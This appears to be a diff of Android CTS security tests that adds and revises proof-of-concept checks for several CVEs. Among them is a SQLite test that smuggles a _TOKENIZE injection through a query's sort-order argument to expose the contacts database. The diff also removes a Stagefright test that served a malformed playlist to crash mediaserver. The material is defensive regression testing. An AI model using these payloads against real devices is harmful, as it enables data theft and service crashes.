--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/TestActivity.java
@@ -0,0 +1,17 @@
+package android.security.cts.CVE_2021_0327;
+
+import android.app.Activity;
+import android.os.Bundle;
+import android.util.Log;
+
+public class TestActivity extends Activity {
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ Log.d("CVE_2021_0327","TestActivity.onCreate()");
+ synchronized(CVE_2021_0327.class){
+ CVE_2021_0327.testActivityCreated=true;
+ CVE_2021_0327.class.notifyAll();
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/AdminReceiver.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/AdminReceiver.java
new file mode 100644
index 0000000..d374dfd
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/AdminReceiver.java
@@ -0,0 +1,7 @@
+package android.security.cts.CVE_2021_0327.workprofilesetup;
+
+import android.app.admin.DeviceAdminReceiver;
+
+public class AdminReceiver extends DeviceAdminReceiver {
+
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/ProvisionedActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/ProvisionedActivity.java
new file mode 100644
index 0000000..1ae1c5d
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/ProvisionedActivity.java
@@ -0,0 +1,43 @@
+package android.security.cts.CVE_2021_0327.workprofilesetup;
+
+import android.app.Activity;
+import android.app.admin.DevicePolicyManager;
+import android.content.ComponentName;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.content.pm.PackageManager;
+import android.os.Bundle;
+
+import android.security.cts.CVE_2021_0327.OtherUserActivity;
+
+public class ProvisionedActivity extends Activity {
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+
+ getPackageManager().setComponentEnabledSetting(
+ new ComponentName(
+ this,
+ OtherUserActivity.class
+ ),
+ PackageManager.COMPONENT_ENABLED_STATE_ENABLED,
+ PackageManager.DONT_KILL_APP
+ );
+
+ DevicePolicyManager manager = getSystemService(DevicePolicyManager.class);
+ //IntentFilter intentFilter = new IntentFilter("com.example.clearedshell.OTHER_USER_ACTIVITY");
+ IntentFilter intentFilter = new IntentFilter("android.security.cts.CVE_2021_0327.OTHER_USER_ACTIVITY");
+ //IntentFilter intentFilter = new IntentFilter("android.security.cts.CVE_2021_0327$OTHER_USER_ACTIVITY");
+ intentFilter.addCategory(Intent.CATEGORY_DEFAULT);
+ ComponentName admin = new ComponentName(this, AdminReceiver.class);
+ manager.addCrossProfileIntentFilter(
+ admin,
+ intentFilter,
+ DevicePolicyManager.FLAG_MANAGED_CAN_ACCESS_PARENT
+ );
+ manager.setProfileEnabled(admin);
+
+ setResult(RESULT_OK);
+ finish();
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0339.java b/tests/tests/security/src/android/security/cts/CVE_2021_0339.java
new file mode 100644
index 0000000..a59d749
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0339.java
@@ -0,0 +1,142 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assert.assertThat;
+import static org.junit.Assume.assumeThat;
+import static org.hamcrest.Matchers.*;
+
+import android.app.Activity;
+import android.content.Context;
+import android.content.Intent;
+import android.os.Bundle;
+import android.os.RemoteCallback;
+import android.os.SystemClock;
+import android.platform.test.annotations.SecurityTest;
+import android.test.AndroidTestCase;
+import android.util.Log;
+import androidx.test.InstrumentationRegistry;
+import androidx.test.runner.AndroidJUnit4;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.concurrent.CompletableFuture;
+import java.util.concurrent.TimeUnit;
+
+@SecurityTest
+@RunWith(AndroidJUnit4.class)
+public class CVE_2021_0339 {
+
+ static final String TAG = CVE_2021_0339.class.getSimpleName();
+ private static final String SECURITY_CTS_PACKAGE_NAME = "android.security.cts";
+ private static final String CALLBACK_KEY = "testactivitycallback";
+ private static final String RESULT_KEY = "testactivityresult";
+ static final int DURATION_RESULT_CODE = 1;
+ static final int MAX_TRANSITION_DURATION_MS = 3000; // internal max
+ static final int TIME_MEASUREMENT_DELAY_MS = 5000; // tolerance for lag.
+
+ private void launchActivity(Class<? extends Activity> clazz, RemoteCallback cb) {
+ final Context context = InstrumentationRegistry.getInstrumentation().getContext();
+ final Intent intent = new Intent(Intent.ACTION_MAIN);
+ intent.setClassName(SECURITY_CTS_PACKAGE_NAME, clazz.getName());
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ intent.putExtra(CALLBACK_KEY, cb);
+ context.startActivity(intent);
+ }
+
+ /**
+ * b/175817167
+ * start the first activity and get the result from the remote callback
+ */
+ @Test
+ @SecurityTest
+ public void testPocCVE_2021_0339() throws Exception {
+ CompletableFuture<Integer> callbackReturn = new CompletableFuture<>();
+ RemoteCallback cb = new RemoteCallback((Bundle result) ->
+ callbackReturn.complete(result.getInt(RESULT_KEY)));
+ launchActivity(FirstActivity.class, cb); // start activity with callback as intent extra
+
+ // blocking while the remotecallback is unset
+ int duration = callbackReturn.get(15, TimeUnit.SECONDS);
+
+ // if we couldn't get the duration of secondactivity in firstactivity, the default is -1
+ assumeThat(duration, not(equals(-1)));
+
+ // the max duration after the fix is 3 seconds.
+ // we check to see that the total duration was less than 8 seconds after accounting for lag
+ assertThat(duration,
+ lessThan(MAX_TRANSITION_DURATION_MS + TIME_MEASUREMENT_DELAY_MS));
+ }
+
+ /**
+ * create an activity so that the second activity has something to animate from
+ * start the second activity and get the result
+ * return the result from the second activity in the remotecallback
+ */
+ public static class FirstActivity extends Activity {
+ private RemoteCallback cb;
+
+ @Override
+ public void onCreate(Bundle bundle) {
+ super.onCreate(bundle);
+ cb = (RemoteCallback) getIntent().getExtras().get(CALLBACK_KEY);
+ }
+
+ @Override
+ public void onEnterAnimationComplete() {
+ super.onEnterAnimationComplete();
+ Intent intent = new Intent(this, SecondActivity.class);
+ intent.putExtra("STARTED_TIMESTAMP", SystemClock.uptimeMillis());
+ startActivityForResult(intent, DURATION_RESULT_CODE);
+ overridePendingTransition(R.anim.translate2,R.anim.translate1);
+ Log.d(TAG,this.getLocalClassName()+" onEnterAnimationComplete()");
+ }
+
+ @Override
+ protected void onActivityResult(int requestCode,int resultCode, Intent data) {
+ super.onActivityResult(requestCode, resultCode, data);
+ if (requestCode == DURATION_RESULT_CODE && resultCode == RESULT_OK) {
+ // this is the result that we requested
+ int duration = data.getIntExtra("duration", -1); // get result from secondactivity
+ Bundle res = new Bundle();
+ res.putInt(RESULT_KEY, duration);
+ finish();
+ cb.sendResult(res); // update callback in test
+ }
+ }
+ }
+
+ /**
+ * measure time since secondactivity start to secondactivity animation complete
+ * return the duration in the result
+ */
+ public static class SecondActivity extends Activity{
+ @Override
+ public void onEnterAnimationComplete() {
+ super.onEnterAnimationComplete();
+ long completedTs = SystemClock.uptimeMillis();
+ long startedTs = getIntent().getLongExtra("STARTED_TIMESTAMP", 0);
+ int duration = (int)(completedTs - startedTs);
+ Log.d(TAG, this.getLocalClassName()
+ + " onEnterAnimationComplete() duration=" + Long.toString(duration));
+ Intent durationIntent = new Intent();
+ durationIntent.putExtra("duration", duration);
+ setResult(RESULT_OK, durationIntent); // set result for firstactivity
+ finish(); // firstactivity only gets the result when we finish
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0394.java b/tests/tests/security/src/android/security/cts/CVE_2021_0394.java
new file mode 100644
index 0000000..6d504f6
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0394.java
@@ -0,0 +1,45 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import androidx.test.filters.RequiresDevice;
+import androidx.test.runner.AndroidJUnit4;
+import org.junit.runner.RunWith;
+import org.junit.Test;
+import static org.junit.Assert.assertFalse;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2021_0394 {
+ static {
+ System.loadLibrary("ctssecurity_jni");
+ }
+
+ /**
+ * b/172655291
+ */
+ @SecurityTest(minPatchLevel = "2021-03")
+ @Test
+ @RequiresDevice
+ // emulators always have checkJNI enabled which causes the test
+ // to abort the VM while passing invalid input to NewStringUTF
+ public void testPocCVE_2021_0394() throws Exception {
+ assertFalse(poc());
+ }
+
+ public static native boolean poc();
+}
diff --git a/tests/tests/security/src/android/security/cts/CertificateData.java b/tests/tests/security/src/android/security/cts/CertificateData.java
index 0b4780f..118b40f 100644
--- a/tests/tests/security/src/android/security/cts/CertificateData.java
+++ b/tests/tests/security/src/android/security/cts/CertificateData.java
@@ -17,14 +17,12 @@
*/
package android.security.cts;
-import android.platform.test.annotations.SecurityTest;
/**
* Run "./cts/tools/utils/java-cert-list-generator.sh >
* cts/tests/tests/security/src/android/security/cts/CertificateData.java"
* to generate this file.
*/
-@SecurityTest
class CertificateData {
static final String[] CERTIFICATE_DATA = {
"91:C6:D6:EE:3E:8A:C8:63:84:E5:48:C2:99:29:5C:75:6C:81:7B:81",
diff --git a/tests/tests/security/src/android/security/cts/CertificateTest.java b/tests/tests/security/src/android/security/cts/CertificateTest.java
index 2d88988..7b1ed9d 100644
--- a/tests/tests/security/src/android/security/cts/CertificateTest.java
+++ b/tests/tests/security/src/android/security/cts/CertificateTest.java
@@ -20,7 +20,6 @@
import java.io.FileInputStream;
import java.io.IOException;
import android.content.pm.PackageManager;
-import android.platform.test.annotations.SecurityTest;
import android.test.AndroidTestCase;
import java.security.KeyStore;
import java.security.KeyStoreException;
@@ -37,7 +36,6 @@
import java.util.List;
import java.util.Set;
-@SecurityTest
public class CertificateTest extends AndroidTestCase {
// The directory for CA root certificates trusted by WFA (WiFi Alliance)
private static final String DIR_OF_CACERTS_FOR_WFA =
diff --git a/tests/tests/security/src/android/security/cts/PackageSignatureTest.java b/tests/tests/security/src/android/security/cts/PackageSignatureTest.java
index 3aec394..c5234d6 100644
--- a/tests/tests/security/src/android/security/cts/PackageSignatureTest.java
+++ b/tests/tests/security/src/android/security/cts/PackageSignatureTest.java
@@ -148,7 +148,10 @@
"com.android.apex.cts.shim",
// Oom Catcher package to prevent tests from ooming device.
- "com.android.cts.oomcatcher"
+ "com.android.cts.oomcatcher",
+
+ // Collects device info at the start of the test
+ "com.android.compatibility.common.deviceinfo"
));
diff --git a/tests/tests/security/src/android/security/cts/SQLiteTest.java b/tests/tests/security/src/android/security/cts/SQLiteTest.java
new file mode 100644
index 0000000..47407ca
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/SQLiteTest.java
@@ -0,0 +1,81 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.content.Context;
+import android.content.ContentResolver;
+import android.content.Intent;
+import android.content.pm.PackageManager.NameNotFoundException;
+import android.net.Uri;
+import android.platform.test.annotations.SecurityTest;
+import android.provider.VoicemailContract;
+import android.test.AndroidTestCase;
+import androidx.test.InstrumentationRegistry;
+import static org.junit.Assert.*;
+
+@SecurityTest
+public class SQLiteTest extends AndroidTestCase {
+
+ private ContentResolver mResolver;
+ private String mPackageName;
+ private Context mContext;
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ mResolver = getContext().getContentResolver();
+ mContext = InstrumentationRegistry.getTargetContext();
+ mPackageName = mContext.getPackageName();
+ }
+
+ /**
+ * b/139186193
+ */
+ @SecurityTest(minPatchLevel = "2019-11")
+ public void test_android_cve_2019_2195() {
+ Uri uri = VoicemailContract.Voicemails.CONTENT_URI;
+ uri = uri.buildUpon().appendQueryParameter("source_package", mPackageName).build();
+
+ try {
+ mContext.grantUriPermission(mPackageName, uri,
+ Intent.FLAG_GRANT_READ_URI_PERMISSION | Intent.FLAG_GRANT_WRITE_URI_PERMISSION
+ | Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION);
+ } catch (Exception e) {
+ if (e instanceof java.lang.SecurityException) {
+ // this suggests com.android.providers.contacts.VoicemailContentProvider
+ // does not allow granting of Uri permissions, hence return.
+ return;
+ }
+ }
+
+ try {
+ String fileToDump = mContext.createPackageContext("com.android.providers.contacts", 0)
+ .getDatabasePath("contacts2.db").getAbsolutePath();
+ try {
+ mResolver.query(uri, null, null, null,
+ "_id ASC LIMIT _TOKENIZE('calls(_data,_data,_data,source_package,type) VALUES(''"
+ + fileToDump + "'',?,?,''" + mPackageName + "'',4);',0,'','Z')")
+ .close();
+ fail("Vulnerable function exists");
+ } catch (android.database.sqlite.SQLiteException e) {
+ // do nothing
+ }
+ } catch (NameNotFoundException n) {
+ // do nothing
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/StagefrightTest.java b/tests/tests/security/src/android/security/cts/StagefrightTest.java
index 9a1a6df..8b646a2 100644
--- a/tests/tests/security/src/android/security/cts/StagefrightTest.java
+++ b/tests/tests/security/src/android/security/cts/StagefrightTest.java
@@ -1146,91 +1146,6 @@
@Test
@SecurityTest(minPatchLevel = "2018-04")
- public void testStagefright_cve_2017_13279() throws Exception {
- Thread server = new Thread() {
- @Override
- public void run(){
- try (ServerSocket serverSocket = new ServerSocket(8080) {
- {setSoTimeout(10_000);} // time out after 10 seconds
- };
- Socket conn = serverSocket.accept()
- ) {
- OutputStream stream = conn.getOutputStream();
- byte http[] = ("HTTP/1.0 200 OK\r\nContent-Type: application/x-mpegURL\r\n\r\n"
- + "#EXTM3U\n#EXT-X-STREAM-INF:\n").getBytes();
- stream.write(http);
- while(!conn.isClosed())
- stream.write(("a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\n").getBytes());
- }
- catch(IOException e){
- }
- }
- };
- server.start();
- String uri = "http://127.0.0.1:8080/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
- + "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/"
- + "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.m3u8";
- final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
-
- LooperThread t = new LooperThread(new Runnable() {
- @Override
- public void run() {
-
- MediaPlayer mp = new MediaPlayer();
- mp.setOnErrorListener(mpcl);
- mp.setOnPreparedListener(mpcl);
- mp.setOnCompletionListener(mpcl);
- RenderTarget renderTarget = RenderTarget.create();
- Surface surface = renderTarget.getSurface();
- mp.setSurface(surface);
- AssetFileDescriptor fd = null;
- try {
- mp.setDataSource(uri);
- mp.prepareAsync();
- } catch (IOException e) {
- Log.e(TAG, e.toString());
- } finally {
- closeQuietly(fd);
- }
-
- Looper.loop();
- mp.release();
- }
- });
- t.start();
- Thread.sleep(60000); // Poc takes a while to crash mediaserver, waitForError
- // doesn't wait long enough
- assertFalse("Device *IS* vulnerable to CVE-2017-13279",
- mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
- t.stopLooper();
- t.join(); // wait for thread to exit so we're sure the player was released
- server.join();
- }
-
- @Test
- @SecurityTest(minPatchLevel = "2018-04")
public void testStagefright_cve_2017_13276() throws Exception {
doStagefrightTest(R.raw.cve_2017_13276);
}
@@ -1259,6 +1174,95 @@
***********************************************************/
@Test
+ @SecurityTest(minPatchLevel = "2019-07")
+ public void testStagefright_cve_2019_2107() throws Exception {
+ assumeFalse(ModuleDetector.moduleIsPlayManaged(
+ getInstrumentation().getContext().getPackageManager(),
+ MainlineModule.MEDIA_SOFTWARE_CODEC));
+ int[] frameSizes = getFrameSizes(R.raw.cve_2019_2107_framelen);
+ doStagefrightTestRawBlob(R.raw.cve_2019_2107_hevc, "video/hevc", 1920,
+ 1080, frameSizes);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2019-04")
+ public void testStagefright_cve_2019_2245() throws Exception {
+ doStagefrightTest(R.raw.cve_2019_2245);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2019-04")
+ public void testStagefright_cve_2018_13925() throws Exception {
+ doStagefrightTest(R.raw.cve_2018_13925);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-12")
+ public void testStagefright_cve_2020_11139() throws Exception {
+ doStagefrightTest(R.raw.cve_2020_11139);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-06")
+ public void testStagefright_cve_2020_3663() throws Exception {
+ doStagefrightTest(R.raw.cve_2020_3663);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-08")
+ public void testStagefright_cve_2020_11122() throws Exception {
+ doStagefrightTest(R.raw.cve_2020_11122);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-07")
+ public void testStagefright_cve_2020_3688() throws Exception {
+ doStagefrightTest(R.raw.cve_2020_3688);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-11")
+ public void testStagefright_cve_2020_11168() throws Exception {
+ doStagefrightTest(R.raw.cve_2020_11168);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-06")
+ public void testStagefright_cve_2020_3658() throws Exception {
+ doStagefrightTest(R.raw.cve_2020_3658);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-05")
+ public void testStagefright_cve_2020_3633() throws Exception {
+ doStagefrightTest(R.raw.cve_2020_3633);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-06")
+ public void testStagefright_cve_2020_3660() throws Exception {
+ doStagefrightTest(R.raw.cve_2020_3660);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-06")
+ public void testStagefright_cve_2020_3661() throws Exception {
+ doStagefrightTest(R.raw.cve_2020_3661);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-01")
+ public void testStagefright_cve_2019_14013() throws Exception {
+ doStagefrightTest(R.raw.cve_2019_14013);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-06")
+ public void testStagefright_cve_2020_3662() throws Exception {
+ doStagefrightTest(R.raw.cve_2020_3662);
+ }
+
+ @Test
@SecurityTest(minPatchLevel = "2021-01")
public void testStagefright_cve_2021_0312() throws Exception {
assumeFalse(ModuleDetector.moduleIsPlayManaged(
@@ -1868,7 +1872,9 @@
Thread.sleep(CHECK_INTERVAL);
timeout -= CHECK_INTERVAL;
}
+
if (!reportFile.exists() || !reportFile.isFile() || !lockFile.exists()) {
+ Log.e(TAG, "couldn't get the report or lock file");
return null;
}
try (BufferedReader reader = new BufferedReader(new FileReader(reportFile))) {
@@ -1933,7 +1939,9 @@
if (what != MediaPlayer.MEDIA_ERROR_SERVER_DIED) {
what = newWhat;
}
+
lock.lock();
+ errored = true;
condition.signal();
lock.unlock();
@@ -1956,17 +1964,19 @@
public int waitForError() throws InterruptedException {
lock.lock();
- if (condition.awaitNanos(TIMEOUT_NS) <= 0) {
- Log.d(TAG, "timed out on waiting for error");
+ if (!errored && !completed) {
+ if (condition.awaitNanos(TIMEOUT_NS) <= 0) {
+ Log.d(TAG, "timed out on waiting for error. " +
+ "errored: " + errored + ", completed: " + completed);
+ }
}
lock.unlock();
- if (what != 0) {
+ if (what == MediaPlayer.MEDIA_ERROR_SERVER_DIED) {
// Sometimes mediaserver signals a decoding error first, and *then* crashes
// due to additional in-flight buffers being processed, so wait a little
// and see if more errors show up.
+ Log.e(TAG, "couldn't get media crash yet, waiting 1 second");
SystemClock.sleep(1000);
- }
- if (what == MediaPlayer.MEDIA_ERROR_SERVER_DIED) {
JSONArray crashes = getCrashReport(name.getMethodName(), 5000);
if (crashes == null) {
Log.e(TAG, "Crash results not found for test " + name.getMethodName());
@@ -1979,8 +1989,8 @@
// 0 is the code for no error.
return 0;
}
-
}
+ Log.d(TAG, "waitForError finished with no errors.");
return what;
}
@@ -1997,6 +2007,7 @@
Condition condition = lock.newCondition();
int what;
boolean completed = false;
+ boolean errored = false;
}
class LooperThread extends Thread {
diff --git a/tests/tests/syncmanager/AndroidTest.xml b/tests/tests/syncmanager/AndroidTest.xml
index 4c53d79..72e13ae 100644
--- a/tests/tests/syncmanager/AndroidTest.xml
+++ b/tests/tests/syncmanager/AndroidTest.xml
@@ -48,6 +48,8 @@
</target_preparer>
<test class="com.android.tradefed.testtype.AndroidJUnitTest" >
<option name="package" value="android.content.syncmanager.cts" />
- <option name="runtime-hint" value="10m00s" />
+ <!-- max timeout of 10 min for each test -->
+ <option name="test-timeout" value="600000" />
+ <option name="runtime-hint" value="20m00s" />
</test>
</configuration>
diff --git a/tests/tests/telephony/current/src/android/telephony/cts/SubscriptionManagerTest.java b/tests/tests/telephony/current/src/android/telephony/cts/SubscriptionManagerTest.java
index 01401f8..86371fd 100644
--- a/tests/tests/telephony/current/src/android/telephony/cts/SubscriptionManagerTest.java
+++ b/tests/tests/telephony/current/src/android/telephony/cts/SubscriptionManagerTest.java
@@ -18,6 +18,7 @@
import static android.net.NetworkCapabilities.NET_CAPABILITY_INTERNET;
import static android.net.NetworkCapabilities.NET_CAPABILITY_NOT_CONGESTED;
+import static android.net.NetworkCapabilities.NET_CAPABILITY_NOT_METERED;
import static android.net.NetworkCapabilities.NET_CAPABILITY_NOT_RESTRICTED;
import static android.net.NetworkCapabilities.NET_CAPABILITY_TEMPORARILY_NOT_METERED;
import static android.net.NetworkCapabilities.TRANSPORT_CELLULAR;
@@ -124,6 +125,7 @@
@AfterClass
public static void tearDownClass() throws Exception {
if (!isSupported()) return;
+ TelephonyUtils.flushTelephonyMetrics(InstrumentationRegistry.getInstrumentation());
}
@Before
@@ -347,13 +349,12 @@
mSm.setSubscriptionPlans(mSubId, Arrays.asList(buildValidSubscriptionPlan()));
// Cellular is metered by default
- assertFalse(cm.getNetworkCapabilities(net).hasCapability(
- NET_CAPABILITY_TEMPORARILY_NOT_METERED));
+ assertFalse(cm.getNetworkCapabilities(net).hasCapability(NET_CAPABILITY_NOT_METERED));
// Override should make it go temporarily unmetered
{
final CountDownLatch latch = waitForNetworkCapabilities(net, caps -> {
- return caps.hasCapability(NET_CAPABILITY_TEMPORARILY_NOT_METERED);
+ return caps.hasCapability(NET_CAPABILITY_NOT_METERED);
});
mSm.setSubscriptionOverrideUnmetered(mSubId, true, 0);
assertTrue(latch.await(10, TimeUnit.SECONDS));
@@ -362,7 +363,7 @@
// Clearing override should make it go metered
{
final CountDownLatch latch = waitForNetworkCapabilities(net, caps -> {
- return !caps.hasCapability(NET_CAPABILITY_TEMPORARILY_NOT_METERED);
+ return !caps.hasCapability(NET_CAPABILITY_NOT_METERED);
});
mSm.setSubscriptionOverrideUnmetered(mSubId, false, 0);
assertTrue(latch.await(10, TimeUnit.SECONDS));
diff --git a/tests/tests/telephony/current/src/android/telephony/cts/TelephonyUtils.java b/tests/tests/telephony/current/src/android/telephony/cts/TelephonyUtils.java
index f389098..b3515cd 100644
--- a/tests/tests/telephony/current/src/android/telephony/cts/TelephonyUtils.java
+++ b/tests/tests/telephony/current/src/android/telephony/cts/TelephonyUtils.java
@@ -35,6 +35,9 @@
private static final String COMMAND_END_BLOCK_SUPPRESSION = "cmd phone end-block-suppression";
+ private static final String COMMAND_FLUSH_TELEPHONY_METRICS =
+ "/system/bin/dumpsys activity service TelephonyDebugService --metricsproto";
+
public static void addTestEmergencyNumber(Instrumentation instr, String testNumber)
throws Exception {
executeShellCommand(instr, COMMAND_ADD_TEST_EMERGENCY_NUMBER + testNumber);
@@ -49,6 +52,10 @@
executeShellCommand(instr, COMMAND_END_BLOCK_SUPPRESSION);
}
+ public static void flushTelephonyMetrics(Instrumentation instr) throws Exception {
+ executeShellCommand(instr, COMMAND_FLUSH_TELEPHONY_METRICS);
+ }
+
public static boolean isSkt(TelephonyManager telephonyManager) {
return isOperator(telephonyManager, "45005");
}
diff --git a/tests/tests/text/AndroidTest.xml b/tests/tests/text/AndroidTest.xml
index 2af8059..8c8c30d 100644
--- a/tests/tests/text/AndroidTest.xml
+++ b/tests/tests/text/AndroidTest.xml
@@ -21,6 +21,10 @@
<option name="config-descriptor:metadata" key="parameter" value="secondary_user" />
<target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
<option name="cleanup-apks" value="true" />
+ <option name="test-file-name" value="CtsTextTestResourceData.apk" />
+ </target_preparer>
+ <target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
+ <option name="cleanup-apks" value="true" />
<option name="test-file-name" value="CtsTextTestCases.apk" />
</target_preparer>
<test class="com.android.tradefed.testtype.AndroidJUnitTest" >
diff --git a/tests/tests/text/resourceApk/Android.bp b/tests/tests/text/resourceApk/Android.bp
new file mode 100644
index 0000000..3f4d4c9
--- /dev/null
+++ b/tests/tests/text/resourceApk/Android.bp
@@ -0,0 +1,33 @@
+// Copyright (C) 2021 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test {
+ name: "CtsTextTestResourceData",
+ defaults: ["cts_defaults"],
+
+ srcs: [
+ "src/**/*.java",
+ "src/**/*.kt",
+ ],
+
+ test_suites: [
+ "cts",
+ "general-tests",
+ "mts",
+ ],
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java b/tests/tests/text/resourceApk/AndroidManifest.xml
similarity index 62%
copy from tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java
copy to tests/tests/text/resourceApk/AndroidManifest.xml
index f32aa90..8851b0d 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java
+++ b/tests/tests/text/resourceApk/AndroidManifest.xml
@@ -1,5 +1,6 @@
-/*
- * Copyright (C) 2020 The Android Open Source Project
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ * Copyright (C) 2021 The Android Open Source Project
*
